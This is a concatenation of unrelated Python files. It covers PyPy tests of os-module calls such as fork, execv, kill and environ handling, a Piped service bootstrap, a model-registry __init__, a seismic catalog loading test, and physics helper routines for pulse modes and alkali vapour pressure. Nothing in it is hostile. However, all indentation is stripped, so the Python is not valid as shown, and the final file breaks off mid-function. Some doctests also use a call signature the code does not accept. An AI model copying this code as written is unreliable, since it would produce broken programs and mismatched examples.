assert f(2) == os.isatty(2)
def test_getcwd():
def does_stuff():
return os.getcwd()
f1 = compile(does_stuff, [])
res = f1()
assert res == os.getcwd()
def test_system():
def does_stuff(cmd):
return os.system(cmd)
f1 = compile(does_stuff, [str])
res = f1("echo hello")
assert res == 0
def test_os_path_exists():
tmpfile = str(udir.join('test_os_path_exists.TMP'))
def fn():
return os.path.exists(tmpfile)
f = compile(fn, [])
open(tmpfile, 'w').close()
assert f() == True
os.unlink(tmpfile)
assert f() == False
def test_os_path_isdir():
directory = "./."
def fn():
return os.path.isdir(directory)
f = compile(fn, [])
assert f() == True
directory = "some/random/name"
def fn():
return os.path.isdir(directory)
f = compile(fn, [])
assert f() == False
def test_time_time():
import time
def fn():
return time.time()
f = compile(fn, [])
t0 = time.time()
res = fn()
t1 = time.time()
assert t0 <= res <= t1
def test_formatd():
from rpython.rlib.rfloat import formatd
def fn(x):
return formatd(x, 'f', 2, 0)
f = compile(fn, [float])
assert f(0.0) == "0.00"
assert f(1.5) == "1.50"
assert f(2.0) == "2.00"
def test_float_to_str():
def fn(f):
return str(f)
f = compile(fn, [float])
res = f(1.5)
assert eval(res) == 1.5
def test_os_unlink():
tmpfile = str(udir.join('test_os_path_exists.TMP'))
def fn():
os.unlink(tmpfile)
f = compile(fn, [])
open(tmpfile, 'w').close()
fn()
assert not os.path.exists(tmpfile)
def test_chdir():
def does_stuff(path):
os.chdir(path)
return os.getcwd()
f1 = compile(does_stuff, [str])
if os.name == 'nt':
assert f1(os.environ['TEMP']) == os.path.realpath(os.environ['TEMP'])
else:
assert f1('/tmp') == os.path.realpath('/tmp')
def test_mkdir_rmdir():
def does_stuff(path, delete):
if delete:
os.rmdir(path)
else:
os.mkdir(path, 0777)
f1 = compile(does_stuff, [str, bool])
dirname = str(udir.join('test_mkdir_rmdir'))
f1(dirname, False)
assert os.path.exists(dirname) and os.path.isdir(dirname)
f1(dirname, True)
assert not os.path.exists(dirname)
def test_strerror():
def does_stuff(n):
return os.strerror(n)
f1 = compile(does_stuff, [int])
for i in range(4):
res = f1(i)
assert res == os.strerror(i)
def test_pipe_dup_dup2():
def does_stuff():
a, b = os.pipe()
c = os.dup(a)
d = os.dup(b)
assert a != b
assert a != c
assert a != d
assert b != c
assert b != d
assert c != d
os.close(c)
os.dup2(d, c)
e, f = os.pipe()
assert e != a
assert e != b
assert e != c
assert e != d
assert f != a
assert f != b
assert f != c
assert f != d
assert f != e
os.close(a)
os.close(b)
os.close(c)
os.close(d)
os.close(e)
os.close(f)
return 42
f1 = compile(does_stuff, [])
res = f1()
assert res == 42
def test_os_chmod():
tmpfile = str(udir.join('test_os_chmod.txt'))
f = open(tmpfile, 'w')
f.close()
# use a witness for the permissions we should expect -
# on Windows it is not possible to change all the bits with chmod()
tmpfile2 = str(udir.join('test_os_chmod_witness.txt'))
f = open(tmpfile2, 'w')
f.close()
def does_stuff(mode):
os.chmod(tmpfile, mode)
f1 = compile(does_stuff, [int])
f1(0000)
os.chmod(tmpfile2, 0000)
assert os.stat(tmpfile).st_mode & 0777 == os.stat(tmpfile2).st_mode & 0777
f1(0644)
os.chmod(tmpfile2, 0644)
assert os.stat(tmpfile).st_mode & 0777 == os.stat(tmpfile2).st_mode & 0777
if hasattr(os, 'fchmod'):
def test_os_fchmod():
tmpfile1 = str(udir.join('test_os_fchmod.txt'))
def does_stuff():
fd = os.open(tmpfile1, os.O_WRONLY | os.O_CREAT, 0777)
os.fchmod(fd, 0200)
os.close(fd)
f1 = compile(does_stuff, [])
f1()
assert os.stat(tmpfile1).st_mode & 0777 == 0200
def test_os_rename():
tmpfile1 = str(udir.join('test_os_rename_1.txt'))
tmpfile2 = str(udir.join('test_os_rename_2.txt'))
f = open(tmpfile1, 'w')
f.close()
def does_stuff():
os.rename(tmpfile1, tmpfile2)
f1 = compile(does_stuff, [])
f1()
assert os.path.exists(tmpfile2)
assert not os.path.exists(tmpfile1)
if hasattr(os, 'mkfifo'):
def test_os_mkfifo():
tmpfile = str(udir.join('test_os_mkfifo.txt'))
def does_stuff():
os.mkfifo(tmpfile, 0666)
f1 = compile(does_stuff, [])
f1()
import stat
st = os.lstat(tmpfile)
assert stat.S_ISFIFO(st.st_mode)
if hasattr(os, 'mknod'):
def test_os_mknod():
import stat
tmpfile = str(udir.join('test_os_mknod.txt'))
def does_stuff():
os.mknod(tmpfile, 0600 | stat.S_IFIFO, 0)
f1 = compile(does_stuff, [])
f1()
st = os.lstat(tmpfile)
assert stat.S_ISFIFO(st.st_mode)
def test_os_umask():
def does_stuff():
mask1 = os.umask(0660)
mask2 = os.umask(mask1)
return mask2
f1 = compile(does_stuff, [])
res = f1()
assert res == does_stuff()
if hasattr(os, 'getpid'):
def test_os_getpid():
def does_stuff():
return os.getpid()
f1 = compile(does_stuff, [])
res = f1()
assert res != os.getpid()
if hasattr(os, 'getpgrp'):
def test_os_getpgrp():
def does_stuff():
return os.getpgrp()
f1 = compile(does_stuff, [])
res = f1()
assert res == os.getpgrp()
if hasattr(os, 'setpgrp'):
def test_os_setpgrp():
def does_stuff():
return os.setpgrp()
f1 = compile(does_stuff, [])
res = f1()
assert res == os.setpgrp()
if hasattr(os, 'link'):
def test_links():
import stat
tmpfile1 = str(udir.join('test_links_1.txt'))
tmpfile2 = str(udir.join('test_links_2.txt'))
tmpfile3 = str(udir.join('test_links_3.txt'))
f = open(tmpfile1, 'w')
f.close()
def does_stuff():
os.symlink(tmpfile1, tmpfile2)
os.link(tmpfile1, tmpfile3)
assert os.readlink(tmpfile2) == tmpfile1
flag= 0
st = os.lstat(tmpfile1)
flag = flag*10 + stat.S_ISREG(st[0])
flag = flag*10 + stat.S_ISLNK(st[0])
st = os.lstat(tmpfile2)
flag = flag*10 + stat.S_ISREG(st[0])
flag = flag*10 + stat.S_ISLNK(st[0])
st = os.lstat(tmpfile3)
flag = flag*10 + stat.S_ISREG(st[0])
flag = flag*10 + stat.S_ISLNK(st[0])
return flag
f1 = compile(does_stuff, [])
res = f1()
assert res == 100110
assert os.path.islink(tmpfile2)
assert not os.path.islink(tmpfile3)
if hasattr(os, 'fork'):
def test_fork():
def does_stuff():
pid = os.fork()
if pid == 0: # child
os._exit(4)
pid1, status1 = os.waitpid(pid, 0)
assert pid1 == pid
return status1
f1 = compile(does_stuff, [])
status1 = f1()
assert os.WIFEXITED(status1)
assert os.WEXITSTATUS(status1) == 4
if hasattr(os, 'kill'):
def test_kill():
import signal
def does_stuff():
pid = os.fork()
if pid == 0: # child
time.sleep(5)
os._exit(4)
os.kill(pid, signal.SIGTERM) # in the parent
pid1, status1 = os.waitpid(pid, 0)
assert pid1 == pid
return status1
f1 = compile(does_stuff, [])
status1 = f1()
assert os.WIFSIGNALED(status1)
assert os.WTERMSIG(status1) == signal.SIGTERM
elif hasattr(os, 'waitpid'):
# windows has no fork but some waitpid to be emulated
def test_waitpid():
prog = str(sys.executable)
def does_stuff():
args = [prog]
# args = [prog, '-c', '"import os;os._exit(4)"']
# note that the above variant creates a bad array
args.append('-c')
args.append('"import os;os._exit(4)"')
pid = os.spawnv(os.P_NOWAIT, prog, args)
#if pid == 0: # child
# os._exit(4)
pid1, status1 = os.waitpid(pid, 0)
assert pid1 == pid
return status1
f1 = compile(does_stuff, [])
status1 = f1()
# for what reason do they want us to shift by 8? See the doc
assert status1 >> 8 == 4
if hasattr(os, 'kill'):
def test_kill_to_send_sigusr1():
import signal
from rpython.rlib import rsignal
if not 'SIGUSR1' in dir(signal):
py.test.skip("no SIGUSR1 available")
def does_stuff():
rsignal.pypysig_setflag(signal.SIGUSR1)
os.kill(os.getpid(), signal.SIGUSR1)
rsignal.pypysig_ignore(signal.SIGUSR1)
while True:
n = rsignal.pypysig_poll()
if n < 0 or n == signal.SIGUSR1:
break
return n
f1 = compile(does_stuff, [])
got_signal = f1()
assert got_signal == signal.SIGUSR1
if hasattr(os, 'killpg'):
def test_killpg():
import signal
from rpython.rlib import rsignal
def does_stuff():
os.setpgid(0, 0) # become its own separated process group
rsignal.pypysig_setflag(signal.SIGUSR1)
os.killpg(os.getpgrp(), signal.SIGUSR1)
rsignal.pypysig_ignore(signal.SIGUSR1)
while True:
n = rsignal.pypysig_poll()
if n < 0 or n == signal.SIGUSR1:
break
return n
f1 = compile(does_stuff, [])
got_signal = f1()
assert got_signal == signal.SIGUSR1
if hasattr(os, 'chown') and hasattr(os, 'lchown'):
def test_os_chown_lchown():
path1 = udir.join('test_os_chown_lchown-1.txt')
path2 = udir.join('test_os_chown_lchown-2.txt')
path1.write('foobar')
path2.mksymlinkto('some-broken-symlink')
tmpfile1 = str(path1)
tmpfile2 = str(path2)
def does_stuff():
# xxx not really a test, just checks that they are callable
os.chown(tmpfile1, os.getuid(), os.getgid())
os.lchown(tmpfile1, os.getuid(), os.getgid())
os.lchown(tmpfile2, os.getuid(), os.getgid())
try:
os.chown(tmpfile2, os.getuid(), os.getgid())
except OSError:
pass
else:
raise AssertionError("os.chown(broken symlink) should raise")
f1 = compile(does_stuff, [])
f1()
if hasattr(os, 'fchown'):
def test_os_fchown():
path1 = udir.join('test_os_fchown.txt')
tmpfile1 = str(path1)
def does_stuff():
# xxx not really a test, just checks that it is callable
fd = os.open(tmpfile1, os.O_WRONLY | os.O_CREAT, 0777)
os.fchown(fd, os.getuid(), os.getgid())
os.close(fd)
f1 = compile(does_stuff, [])
f1()
if hasattr(os, 'getlogin'):
def test_os_getlogin():
def does_stuff():
return os.getlogin()
try:
expected = os.getlogin()
except OSError, e:
py.test.skip("the underlying os.getlogin() failed: %s" % e)
f1 = compile(does_stuff, [])
assert f1() == expected
# ____________________________________________________________
def _real_getenv(var):
cmd = '''%s -c "import os; x=os.environ.get('%s'); print (x is None) and 'F' or ('T'+x)"''' % (
sys.executable, var)
g = os.popen(cmd, 'r')
output = g.read().strip()
g.close()
if output == 'F':
return None
elif output.startswith('T'):
return output[1:]
else:
raise ValueError('probing for env var returned %r' % (output,))
def test_dictlike_environ_getitem():
def fn(s):
try:
return os.environ[s]
except KeyError:
return '--missing--'
func = compile(fn, [str])
os.environ.setdefault('USER', 'UNNAMED_USER')
result = func('USER')
assert result == os.environ['USER']
result = func('PYPY_TEST_DICTLIKE_MISSING')
assert result == '--missing--'
def test_dictlike_environ_get():
def fn(s):
res = os.environ.get(s)
if res is None: res = '--missing--'
return res
func = compile(fn, [str])
os.environ.setdefault('USER', 'UNNAMED_USER')
result = func('USER')
assert result == os.environ['USER']
result = func('PYPY_TEST_DICTLIKE_MISSING')
assert result == '--missing--'
def test_dictlike_environ_setitem():
def fn(s, t1, t2, t3, t4, t5):
os.environ[s] = t1
os.environ[s] = t2
os.environ[s] = t3
os.environ[s] = t4
os.environ[s] = t5
return os.environ[s]
func = compile(fn, [str] * 6)
r = func('PYPY_TEST_DICTLIKE_ENVIRON', 'a', 'b', 'c', 'FOOBAR', '42')
assert r == '42'
def test_dictlike_environ_delitem():
def fn(s1, s2, s3, s4, s5):
for n in range(10):
os.environ[s1] = 't1'
os.environ[s2] = 't2'
os.environ[s3] = 't3'
os.environ[s4] = 't4'
os.environ[s5] = 't5'
del os.environ[s3]
del os.environ[s1]
del os.environ[s2]
del os.environ[s4]
try:
del os.environ[s2]
except KeyError:
pass
else:
raise Exception("should have raised!")
# os.environ[s5] stays
func = compile(fn, [str] * 5)
func('PYPY_TEST_DICTLIKE_ENVDEL1',
'PYPY_TEST_DICTLIKE_ENVDEL_X',
'PYPY_TEST_DICTLIKE_ENVDELFOO',
'PYPY_TEST_DICTLIKE_ENVDELBAR',
'PYPY_TEST_DICTLIKE_ENVDEL5')
def test_dictlike_environ_keys():
def fn():
return '\x00'.join(os.environ.keys())
func = compile(fn, [])
os.environ.setdefault('USER', 'UNNAMED_USER')
try:
del os.environ['PYPY_TEST_DICTLIKE_ENVKEYS']
except:
pass
result1 = func().split('\x00')
os.environ['PYPY_TEST_DICTLIKE_ENVKEYS'] = '42'
result2 = func().split('\x00')
assert 'USER' in result1
assert 'PYPY_TEST_DICTLIKE_ENVKEYS' not in result1
assert 'USER' in result2
assert 'PYPY_TEST_DICTLIKE_ENVKEYS' in result2
def test_dictlike_environ_items():
def fn():
result = []
for key, value in os.environ.items():
result.append('%s/%s' % (key, value))
return '\x00'.join(result)
func = compile(fn, [])
os.environ.setdefault('USER', 'UNNAMED_USER')
result1 = func().split('\x00')
os.environ['PYPY_TEST_DICTLIKE_ENVITEMS'] = '783'
result2 = func().split('\x00')
assert ('USER/%s' % (os.environ['USER'],)) in result1
assert 'PYPY_TEST_DICTLIKE_ENVITEMS/783' not in result1
assert ('USER/%s' % (os.environ['USER'],)) in result2
assert 'PYPY_TEST_DICTLIKE_ENVITEMS/783' in result2
def test_listdir():
def mylistdir(s):
try:
os.listdir('this/directory/really/cannot/exist')
except OSError:
pass
else:
raise AssertionError("should have failed!")
result = os.listdir(s)
return '/'.join(result)
func = compile(mylistdir, [str])
for testdir in [str(udir), os.curdir]:
result = func(testdir)
result = result.split('/')
result.sort()
compared_with = os.listdir(testdir)
compared_with.sort()
assert result == compared_with
if hasattr(posix, 'execv') and hasattr(posix, 'fork'):
def test_execv():
progname = str(sys.executable)
filename = str(udir.join('test_execv.txt'))
def does_stuff():
l = [progname, '-c', 'open(%r,"w").write("1")' % filename]
pid = os.fork()
if pid == 0:
os.execv(progname, l)
else:
os.waitpid(pid, 0)
func = compile(does_stuff, [], backendopt=False)
func()
assert open(filename).read() == "1"
def test_execv_raising():
def does_stuff():
try:
l = []
l.append("asddsadw32eewdfwqdqwdqwd")
os.execv(l[0], l)
return 1
except OSError:
return -2
func = compile(does_stuff, [])
assert func() == -2
def test_execve():
filename = str(udir.join('test_execve.txt'))
progname = sys.executable
def does_stuff():
l = []
l.append(progname)
l.append("-c")
l.append('import os; open(%r, "w").write(os.environ["STH"])' % filename)
env = {}
env["STH"] = "42"
env["sthelse"] = "a"
pid = os.fork()
if pid == 0:
os.execve(progname, l, env)
else:
os.waitpid(pid, 0)
func = compile(does_stuff, [])
func()
assert open(filename).read() == "42"
if hasattr(posix, 'spawnv'):
def test_spawnv():
filename = str(udir.join('test_spawnv.txt'))
progname = str(sys.executable)
scriptpath = udir.join('test_spawnv.py')
scriptpath.write('f=open(%r,"w")\nf.write("2")\nf.close\n' % filename)
scriptname = str(scriptpath)
def does_stuff():
# argument quoting on Windows is completely ill-defined.
# don't let yourself be fooled by the idea that if os.spawnv()
# takes a list of strings, then the receiving program will
# nicely see these strings as arguments with no further quote
# processing. Achieving this is nearly impossible - even
# CPython doesn't try at all.
l = [progname, scriptname]
pid = os.spawnv(os.P_NOWAIT, progname, l)
os.waitpid(pid, 0)
func = compile(does_stuff, [])
func()
assert open(filename).read() == "2"
if hasattr(posix, 'spawnve'):
def test_spawnve():
filename = str(udir.join('test_spawnve.txt'))
progname = str(sys.executable)
scriptpath = udir.join('test_spawnve.py')
scriptpath.write('import os\n' +
'f=open(%r,"w")\n' % filename +
'f.write(os.environ["FOOBAR"])\n' +
'f.close\n')
scriptname = str(scriptpath)
def does_stuff():
l = [progname, scriptname]
pid = os.spawnve(os.P_NOWAIT, progname, l, {'FOOBAR': '42'})
os.waitpid(pid, 0)
func = compile(does_stuff, [])
func()
assert open(filename).read() == "42"
def test_utime():
path = str(udir.ensure("test_utime.txt"))
from time import time, sleep
t0 = time()
sleep(1)
def does_stuff(flag):
if flag:
os.utime(path, None)
else:
os.utime(path, (int(t0), int(t0)))
func = compile(does_stuff, [int])
func(1)
assert os.stat(path).st_atime > t0
func(0)
assert int(os.stat(path).st_atime) == int(t0)
if hasattr(os, 'uname'):
def test_os_uname():
def does_stuff(num):
tup = os.uname()
lst = [tup[0], tup[1], tup[2], tup[3], tup[4]]
return lst[num]
func = compile(does_stuff, [int])
for i in range(5):
res = func(i)
assert res == os.uname()[i]
if hasattr(os, 'getloadavg'):
def test_os_getloadavg():
def does_stuff():
a, b, c = os.getloadavg()
print a, b, c
return a + b + c
f = compile(does_stuff, [])
res = f()
assert type(res) is float and res >= 0.0
if hasattr(os, 'major'):
def test_os_major_minor():
def does_stuff(n):
a = os.major(n)
b = os.minor(n)
x = os.makedev(a, b)
return '%d,%d,%d' % (a, b, x)
f = compile(does_stuff, [int])
res = f(12345)
assert res == '%d,%d,12345' % (os.major(12345), os.minor(12345))
if hasattr(os, 'fchdir'):
def test_os_fchdir():
def does_stuff():
fd = os.open('/', os.O_RDONLY, 0400)
try:
os.fchdir(fd)
s = os.getcwd()
finally:
os.close(fd)
return s == '/'
f = compile(does_stuff, [])
localdir = os.getcwd()
try:
res = f()
finally:
os.chdir(localdir)
assert res == True
# ____________________________________________________________
class TestExtFuncStandalone(StandaloneTests):
if hasattr(os, 'nice'):
def test_os_nice(self):
def does_stuff(argv):
res = os.nice(3)
print 'os.nice returned', res
return 0
t, cbuilder = self.compile(does_stuff)
data = cbuilder.cmdexec('')
res = os.nice(0) + 3
if res > 19: res = 19 # xxx Linux specific, probably
assert data.startswith('os.nice returned %d\n' % res)
|
# Copyright (c) 2010-2011, Found IT A/S and Piped Project Contributors.
# See LICENSE for details.
import logging
import os
import sys
import json
import yaml
from twisted.internet import reactor
from piped import exceptions, resource, processing, service
logger = logging.getLogger('piped.service')
runtime_environment = processing.RuntimeEnvironment()
runtime_environment.configure()
application = runtime_environment.application
def _on_configuration_loaded():
service_name = runtime_environment.configuration_manager.get('service_name', 'piped')
# Set the process title, if we can.
try:
import setproctitle
setproctitle.setproctitle(service_name)
except ImportError:
# It's just a nicety, though, so don't blow up if we can't.
pass
logger.info('Starting service "%s" (PID %i).'%(service_name, os.getpid()))
provider_plugin_manager = resource.ProviderPluginManager()
provider_plugin_manager.configure(runtime_environment)
service_plugin_manager = service.ServicePluginManager()
service_plugin_manager.configure(runtime_environment)
# Move these into acting upon state changes.
runtime_environment.dependency_manager.resolve_initial_states()
def bootstrap():
configuration_file_path = os.environ.get('PIPED_CONFIGURATION_FILE', None)
overrides = json.loads(os.environ.get('PIPED_CONFIGURATION_OVERRIDES', '[]'))
try:
_fail_if_no_configuration_file_is_specified(configuration_file_path)
runtime_environment.configuration_manager.load_from_file(configuration_file_path)
_handle_configuration_overrides(runtime_environment.configuration_manager, overrides)
_on_configuration_loaded()
except:
logger.critical('Error while bootstrapping service.', exc_info=True)
reactor.stop()
def _handle_configuration_overrides(configuration_manager, overrides):
for override in overrides:
# in yaml, a mapping uses a colon followed by a space, but we want to be able to
# specify -O some.nested.option:42 on the command line, without the space, so we
# add a space after the first colon in the override specification, as doing so does
# not affect an otherwise correct yaml mapping.
adjusted_override = override.replace(':', ': ', 1)
override_as_dict = yaml.load(adjusted_override)
if not isinstance(override_as_dict, dict):
e_msg = 'Invalid override specification.'
detail = 'Expected a yaml mapping, but got %r.' % override
raise exceptions.ConfigurationError(e_msg, detail)
for path, value in override_as_dict.items():
logger.debug('Setting configuration override %r.'%path)
configuration_manager.set(path, value)
def _fail_if_no_configuration_file_is_specified(configuration_file_path):
if not configuration_file_path:
e_msg = 'No configuration file specified.'
detail = ('Either use the -c/--conf option of %r, or set the PIPED_CONFIGURATION_FILE environment '
'variable to the path of the configuration file.' % sys.argv[0])
raise exceptions.ConfigurationError(e_msg, detail)
# The callLater is necessary so providers don't start before forking if we're daemonizing.
reactor.callLater(0, bootstrap)
|
from .edsr import EDSR
from .edvr_net import EDVRNet
from .edvr_net_wopre import EDVRNet_WoPre
from .edvr_net_wopre2 import EDVRNet_WoPre2
from .edvr_net_test import EDVRNet_Test
from .rrdb_net import RRDBNet
from .sr_resnet import MSRResNet
from .srcnn import SRCNN
from .tof import TOFlow
__all__ = [
'MSRResNet', 'RRDBNet', 'EDSR', 'EDVRNet', 'EDVRNet_WoPre',
'EDVRNet_WoPre2', 'EDVRNet_Test', 'TOFlow', 'SRCNN'
]
|
import unittest
import csep
import os.path
import numpy
def get_datadir():
root_dir = os.path.dirname(os.path.abspath(__file__))
data_dir = os.path.join(root_dir, 'artifacts', 'JMA-observed_catalog')
return data_dir
def test_JmaCsvCatalog_loading():
datadir = get_datadir()
csv_file = os.path.join(datadir, 'test.csv')
test_catalog = csep.load_catalog(csv_file, type='jma-csv')
assert len(test_catalog.catalog) == 22284, 'invalid number of events in observed_catalog object'
_dummy = test_catalog.get_magnitudes()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_depths()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_longitudes()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_latitudes()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_epoch_times()
assert len(_dummy) == len(test_catalog.catalog)
_dummy = test_catalog.get_datetimes()
assert len(_dummy) == len(test_catalog.catalog)
# assert (d[0].timestamp() * 1000.) == c.observed_catalog['timestamp'][0]
_datetimes = numpy.ndarray(test_catalog.event_count, dtype='<i8')
_datetimes.fill(numpy.nan)
for _idx, _val in enumerate(_dummy):
_datetimes[_idx] = round(1000. * _val.timestamp())
numpy.testing.assert_allclose(_datetimes, test_catalog.catalog['origin_time'],
err_msg='timestamp mismatch',
verbose=True, rtol=0, atol=0)
|
# -*- coding: utf-8 -*-
# Compatible with Python 3.8
# Copyright (C) 2020-2021 Oscar Gerardo Lazo Arjona
# mailto: oscar.lazoarjona@physics.ox.ac.uk
r"""Miscellaneous routines."""
import numpy as np
import warnings
from scipy.interpolate import interp1d
from numpy import sinc as normalized_sinc
from scipy.special import hermite, factorial
from sympy import log, pi, symbols, exp, diff, sqrt
from sympy import factorial as factorial_sym
from sympy import sinc as sinc_sym
from sympy import Basic, Piecewise, Abs, sin
from scipy.constants import k as k_B
from scipy.constants import c
from scipy.special import gamma as gamma_function
def rel_error(a, b):
r"""Get the relative error between two quantities."""
scalar = not hasattr(a, "__getitem__")
if scalar:
a = np.abs(a)
b = np.abs(b)
if a == 0.0 and b == 0.0:
return 0.0
if a > b:
return 1 - b/a
else:
return 1 - a/b
shape = [2] + list(a.shape)
aux = np.zeros(shape)
aux[0, :] = np.abs(a)
aux[1, :] = np.abs(b)
small = np.amin(aux, axis=0)
large = np.amax(aux, axis=0)
# Replace zeros with one, to avoid zero-division errors.
small[small == 0] = 1
large[large == 0] = 1
err = 1-small/large
if scalar:
return err[0]
return err
def glo_error(a, b, scale=None):
r"""Get the "global" relative error between two quantities."""
if scale is None:
scale = np.amax([np.amax(np.abs(a)), np.amax(np.abs(b))])
if scale == 0.0:
return np.zeros(a.shape)
return np.abs(a-b)/scale
def get_range(fp):
r"""Get the range of an array."""
fp = np.abs(fp)
aux = fp.copy()
aux[aux == 0] = np.amax(fp)
vmin = np.amin(aux)
vmax = np.amax(fp)
return np.array([vmin, vmax])
def interpolator(xp, fp, kind="linear"):
r"""Return an interpolating function that extrapolates to zero."""
F = interp1d(xp, fp, kind)
def f(x):
if isinstance(x, np.ndarray):
return np.array([f(xi) for xi in x])
if xp[0] <= x <= xp[-1]:
return F(x)
else:
return 0.0
return f
def ffftfreq(t):
r"""Calculate the angular frequency axis for a given time axis."""
dt = t[1]-t[0]
nu = np.fft.fftshift(np.fft.fftfreq(t.size, dt))
return nu
def ffftfft(f, t):
r"""Calculate the Fourier transform."""
dt = (t[-1]-t[0])/len(t)
return np.fft.fftshift(np.fft.fft(np.fft.ifftshift(f)))*dt
def iffftfft(f, nu):
r"""Calculate the inverse Fourier transform."""
Deltanu = nu[-1]-nu[0]
return np.fft.fftshift(np.fft.ifft(np.fft.ifftshift(f)))*Deltanu
##############################################################################
# Mode shape routines.
def time_bandwith_product(m=1, symbolic=False):
r"""Return an approximate of the time-bandwidth product for a generalized
pulse.
"""
if symbolic and m == 1:
return 2*log(2)/pi
if m == 1:
return 2*np.log(2)/np.pi
elif str(m) == "oo":
return 0.885892941378901
else:
a, b, B, p = (0.84611760622587673, 0.44076249541699231,
0.87501561821518636, 0.64292796298081856)
return (B-b)*(1-np.exp(-a*(m-1)**p))+b
def hermite_gauss(n, x, sigma, power_fwhm=False):
"""Generate normalized Hermite-Gauss mode."""
if isinstance(x, Basic):
if power_fwhm: sigma = sigma/2/sqrt(log(2))
X = x / sigma
u = symbols("u")
h = (-1)**n*exp(u**2)*diff(exp(-u**2), u, n)
result = h.subs(u, X)*exp(-X**2/2)
result /= sqrt(factorial_sym(n) * sqrt(pi) * 2**n * sigma)
else:
if power_fwhm: sigma = sigma/2/np.sqrt(np.log(2))
X = x / sigma
result = hermite(n)(X) * np.exp(-X**2 / 2)
result /= np.sqrt(factorial(n) * np.sqrt(np.pi) * 2**n * sigma)
return result
def harmonic(n, x, L):
r"""Generate a normalized harmonic mode."""
if isinstance(x, Basic):
omega = pi/L
h = sin(n*omega*(x + L/2))/sqrt(L/2)
else:
omega = np.pi/L
h = np.sin(n*omega*(x + L/2))/np.sqrt(L/2)
h = h*np.where(np.abs(x) < L/2, 1.0, 0.0)
return h
def falling_exponential(x, gamma, a=None, simp=False):
u"""A falling exponential function with `1/e` length `gamma`.
⎧ √γ exp(-γ x/2) for x >= 0
f(x) = ⎨
⎩ 0 otherwise
"""
if isinstance(x, Basic):
f = sqrt(gamma)*exp(-gamma*x/2)
if simp:
return f
else:
return Piecewise(*[(f, x >= 0), (0, True)])
return np.where(x >= 0, np.sqrt(gamma)*np.exp(-gamma*x/2), 0.0)
def gaussian_square(n, t, fwhm):
"""We obtain a normalized function of the form
2⋅n
⎛t⎞
-⎜─⎟
⎝τ⎠
────────
2
ℯ
with the given (amplitude square) fwhm.
"""
if str(n) == "oo":
return heaviside_pi(t/fwhm)/np.sqrt(fwhm)
elif n < 1:
raise ValueError
else:
tau = fwhm*np.log(2)**(-1/(2.0*n))/2
X = t/tau
norm = np.sqrt(2*tau*gamma_function(1 + 1/(2.0*n)))
return np.exp(-X**(2*n)/2)/norm
def sinc(x):
u"""The non-normalized sinc.
⎧ 1 for x = 0
sinc(x) = ⎨
⎩ sin(x)/x otherwise
"""
if isinstance(x, Basic):
return sinc_sym(x)
return normalized_sinc(x/np.pi)
def sech_mode(t, fwhm):
r"""Return a hyperbolic secant mode."""
a = fwhm/2/np.log(1+np.sqrt(2))
return 1/np.cosh(t/a)/np.sqrt(2*a)
def heaviside_theta(x, a=None):
u"""The Heaviside Pi function.
⎧ 1 for x >= 0
Θ(x) = ⎨
⎩ 0 otherwise
"""
if isinstance(x, Basic):
if a is None:
return Piecewise(*[(1, x >= 0), (0, True)])
else:
return Piecewise(*[(1, x > 0), (a, x == 0), (0, True)])
return np.where(x >= 0, 1.0, 0.0)
def heaviside_pi(x):
u"""The Heaviside Pi function.
⎧ 1 for |x| <= 1/2
Π(x) = ⎨
⎩ 0 otherwise
"""
if isinstance(x, Basic):
return Piecewise(*[(1, Abs(x) <= x/x/2), (0, True)])
return np.where(np.abs(x) <= 0.5, 1.0, 0.0)
def heaviside_lambda(t):
u"""The Heaviside Lambda function.
⎧ 1 - |t| for |t| < 1
Λ(t) = ⎨
⎩ 0 otherwise
"""
if hasattr(t, "__getitem__"):
return np.where(np.abs(t) < 1, 1-np.abs(t), 0.0)
return Piecewise((1 - Abs(t), Abs(t) < 1),
(0, True))
def num_integral(f, dt):
"""We integrate using the trapezium rule."""
if hasattr(dt, "__getitem__"):
dt = dt[1]-dt[0]
F = sum(f[1:-1])
F += (f[1] + f[-1])*0.5
return np.real(F*dt)
##############################################################################
# Alkali vapour routines.
def vapour_pressure(params):
r"""Return the vapour pressure of rubidium or cesium in Pascals.
This function receives as input the temperature in Kelvins and the
name of the element.
>>> print vapour_pressure(25.0 + 273.15,"Rb")
5.31769896107e-05
>>> print vapour_pressure(39.3 + 273.15,"Rb")
0.000244249795696
>>> print vapour_pressure(90.0 + 273.15,"Rb")
0.0155963687128
>>> print vapour_pressure(25.0 + 273.15,"Cs")
0.000201461144963
>>> print vapour_pressure(28.5 + 273.15,"Cs")
0.000297898928349
>>> print vapour_pressure(90.0 + 273.15,"Cs")
0.0421014384667
The element must be in the database.
>>> print vapour_pressure(90.0 + 273.15,"Ca")
Traceback (most recent call last):
...
ValueError: Ca is not an element in the database for this function.
References:
[1] Daniel A. Steck, "Cesium D Line Data," available online at
http://steck.us/alkalidata (revision 2.1.4, 23 December 2010).
[2] Daniel A. Steck, "Rubidium 85 D Line Data," available online at
http://steck.us/alkalidata (revision 2.1.5, 19 September 2012).
[3] Daniel A. Steck, "Rubidium 87 D Line Data," available online at
http://steck.us/alkalidata (revision 2.1.5, 19 September 2012).
"""
Temperature = params["Temperature"]
element = params["element"]
if element == "Rb":
Tmelt = 39.30+273.15 # K.
if Temperature < Tmelt:
P = 10**(2.881+4.857-4215.0/Temperature) # Torr.
else:
P = 10**(2.881+4.312-4040.0/Temperature) # Torr.
elif element == "Cs":
Tmelt = 28.5 + 273.15 # K.
if Temperature < Tmelt:
P = 10**(2.881+4.711-3999.0/Temperature) # Torr.
else:
P = 10**(2.881+4.165-3830.0/Temperature) # Torr.
else:
s = str(element)
s += " is not an element in the database for this function."
raise ValueError(s)
P = P * 101325.0/760.0 # Pascals.
return P
def vapour_number_density(params):
r"""Return the number of atoms in a rubidium or cesium vapour in m^-3.
It receives as input the temperature in Kelvins and the
name of the element.
>>> print vapour_number_density(90.0 + 273.15,"Cs")
8.39706962725e+18
"""
Temperature = params["Temperature"]
return vapour_pressure(params)/k_B/Temperature
def rayleigh_range(params):
r"""Return the Rayleigh range for signal and control."""
ws = params["w1"]
wc = params["w1"]
lams = c/(params["omega21"]/2/np.pi)
lamc = c/(params["omega32"]/2/np.pi)
return np.pi*ws**2/lams, np.pi*wc**2/lamc
##############################################################################
# Finite difference miscellaneous routines.
def build_t_mesh(params, uniform=True, return_bounds=False):
r"""Build a variable density mesh for the time axis.
We ensure that within three fwhm there are a tenth of the
points, or at least 200.
"""
Nfwhms = 2.0
